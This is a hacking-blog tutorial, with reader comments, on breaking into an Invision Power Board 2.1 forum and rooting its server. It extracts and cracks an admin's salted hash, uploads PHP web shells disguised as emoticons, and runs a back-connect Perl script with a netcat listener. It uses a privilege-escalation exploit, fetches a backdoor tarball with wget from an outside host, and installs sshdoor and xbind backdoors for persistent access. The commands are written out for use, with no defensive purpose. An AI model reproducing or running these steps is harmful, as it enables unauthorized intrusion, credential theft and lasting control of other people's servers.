Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates
Exploiting and Rooting a Webserver from
Exploiting and Rooting a Webserver from
Scratch Complete Tutorial
Scratch Complete Tutorial
Intro:
Hey guys this is The 7th Sage and for todays tutorial we shall learn how to
exploit and root a webserver also gaining future access. The tutorial is most likely to be divided in three parts.
1) Gaining Admin Access.
2) Uploading The Shell
3) Using the Shell to Gain Root Access
Hacking a Forum Admin using Exploit to Gain
Admin Access - Part 1
Admin Access - Part 1
As said earlier i'm going to exploit ipb v2.1 forum here. You can hack
other forums too using exploits or making own exploits (which is rare :P)
Tools Needed:
This has the shell and backdoor files along with MD5 HashCracking tool and
some other things.
Download:
Gaining Admin Access.
For today i will be hacking an ipb 2.1 forum by gaining admin access and
then I will show you how to root the server.
First i will be using a perl exploit and gain admin access to the forum. Usually the admin id
is 1 maybe 0 or 2 sometimes.
Here it is this guy:
UserName: Kawool
UserId = 2
Next we extract the user hash and salt. Switch to cmd and execute the perl
exploit.
![[Image: 13230167.jpg]](http://img163.imageshack.us/img163/3986/13230167.jpg)
Then you should see this sql injection tool.
Change the forum index path, userid (of the admin), the table name.
![[Image: 59925653.jpg]](http://img8.imageshack.us/img8/1192/59925653.jpg)
After you click get data from database you should see this hash:
![[Image: 2iql3ex.jpg]](http://i46.tinypic.com/2iql3ex.jpg)
Then use converage pass salt option.
![[Image: 2yuk7cg.jpg]](http://i48.tinypic.com/2yuk7cg.jpg)
After you get the hash the next step to do is crack the salted hash. Since
it is ipb , cracking the hash will be a pain for sure.
Cracking the Hash:
I have provided passwords pro in the download above. It is a very efficient
tool to crack md5 hashes, even salted ones.
![[Image: vwu8ud.jpg]](http://i47.tinypic.com/vwu8ud.jpg)
Now probably go to sleep or drink 4-5 cup of tea until the hash is cracked.
I got mine after sometime.
![[Image: 317a8tf.jpg]](http://i46.tinypic.com/317a8tf.jpg)
So now
Code:
Username: Kawool
Password: *******I'm gonna login as admin now ^^; Lets move on to the main part of gaining root access.
Uploading The Shell as Admin - Part 2
Uploading a Shell:
Now that we have the admin access in our hand now is the part when we
upload a shell (For those who don't know what a shell is, It is a php script that gives
privilages to upload files on a website, mess with other files etc. And yeah allows to gain
root access too).
Uploading shell as smiley here.
In the ACP Go to Look and Feel -> Emoticon Manager -> Upload the shell file as smiley.
![[Image: x3vfuw.jpg]](http://i48.tinypic.com/x3vfuw.jpg)
Now lets browse our shell shall we..
![[Image: vzdnb5.jpg]](http://i45.tinypic.com/vzdnb5.jpg)
w00t we has the shell uploaded properly.Next upload a c99 shell from this shell. Why we did
this is because c99 shells can be detected somwetimes. So the other shell is like a decoy.
Once its done we upload c99 shell.
![[Image: 2d1x0uh.jpg]](http://i45.tinypic.com/2d1x0uh.jpg)
Good shell was uploaded properly.
![[Image: m5vza.jpg]](http://i49.tinypic.com/m5vza.jpg)
That does it for our 2nd part. Move on to Third.
Using the Shell to Gain Root Access - Part 3
Now that we have all the shit ready for rooting lets upload a backconnect script. There are many and if one doesn't work usually the other does.
So i upload back.pl i provided in the file.
![[Image: rlgoqo.jpg]](http://i47.tinypic.com/rlgoqo.jpg)
After thats done time to use the script.
For this we give the following code.
Code:
perl back.pl youripaddress![[Image: 2qvyx4n.jpg]](http://i47.tinypic.com/2qvyx4n.jpg)
BEFORE we execute the script we need to start netcat and start listening to conenctions on
port 2121.
use netcat from my downloadfile, and use the command:
Code:
nc -vv -l -p 2121You should see something like this
![[Image: 6s6us6.jpg]](http://i50.tinypic.com/6s6us6.jpg)
Next we shall upload an exploit that will let us obtain root status on the server :)
![[Image: 214wq3m.jpg]](http://i46.tinypic.com/214wq3m.jpg)
Time to execute it.
![[Image: 15x8g1j.jpg]](http://i47.tinypic.com/15x8g1j.jpg)
Now we upload a backdoor for future access.
Type in the following command
Code:
wget www.revitalizemessage.com/xpl/sshdoor.tgz (or whatever ur link is)![[Image: 9i9xdk.jpg]](http://i47.tinypic.com/9i9xdk.jpg)
Now the following command.
Code:
tar -zxvf sshdoor.tgzThen we make sshdoor the current directory using this code..
Code:
cd sshdoorThen
Code:
cat READMEafter you see the window with sang and prabu name. Execute the command
Code:
.install yourpassword 2121After thats done, we connect to the server via putty.
![[Image: ibayw9.jpg]](http://i50.tinypic.com/ibayw9.jpg)
Err an Epic Fail has occured my friends.
![[Image: 142hv09.jpg]](http://i46.tinypic.com/142hv09.jpg)
Maybe the host blocked the port, nmap scan revealed it. Oh well we upload another backdoor quickly. You don't always win :D (actually hackers do O_O).
Now we upload xbind.c this should be over quickly. Remember the steps don't you?:D
Indeed its easy.
![[Image: 17detv.jpg]](http://i49.tinypic.com/17detv.jpg)
Compile the xbind.c using gcc compiler. (be sure to type cd.. and be in the correct directory to work with the script).
Code:
gcc -o xbind xbind.cCompile, run and connect.
Paste the following code now
Code:
./xbind 1985Switch to netcat again. and run the connection code (nc vv blah blha blah) to the ip.
Now enter teh password and get going.
Code:
uname -a![[Image: 29wv9yb.jpg]](http://i50.tinypic.com/29wv9yb.jpg)
There you go, we now have future access to the server :)
That does it for our Rooting Server tutorial which will be "tltr" for some people. Gaining root access is a pain but its worth the reward. So now that you read this tut, please comment :D
Hope to bring more tuts in near future ^^;
______________________________________________________________
Credits:
Main Credits go To Neutralise who had a similar vid and provided the backdoor files. I took some tips and some screenies from him.
Last but not the least HF members who pm me to write more tuts ^^;
This post was written by:
Adnan Anjum - who has written 1000+ posts on hackguide4u.
Adnan Anjum is a professional Geek. Follow him on Twitter or email him
Subscribe to:
Post Comments (Atom)
Share your views...
5 Respones to "Exploiting and Rooting a Webserver from"
Hey man I dn't understand much better am into hacking but still a learner..
what is your yahoo id or msn so i can add u and we can chat..
August 28, 2010 at 12:46 PM
Very nice tutorial. I can see you know what you are doing but your english is a bit rusty. Keep up the good work!
September 17, 2010 at 6:49 AM
I cannot seem to find the SQL Injection tool used in the beginning of the tutorial. Is it included? If not where can I find a copy of the script?
Thanks in advance
September 17, 2010 at 1:13 PM
hi veryr nice work but not found this sql injection tool. can i get it plz
October 21, 2010 at 11:19 AM
here is the link check it out :)
http://sql-injection-tools.blogspot.com/2010/10/invision-power-board-sql-injection.html
Post a Comment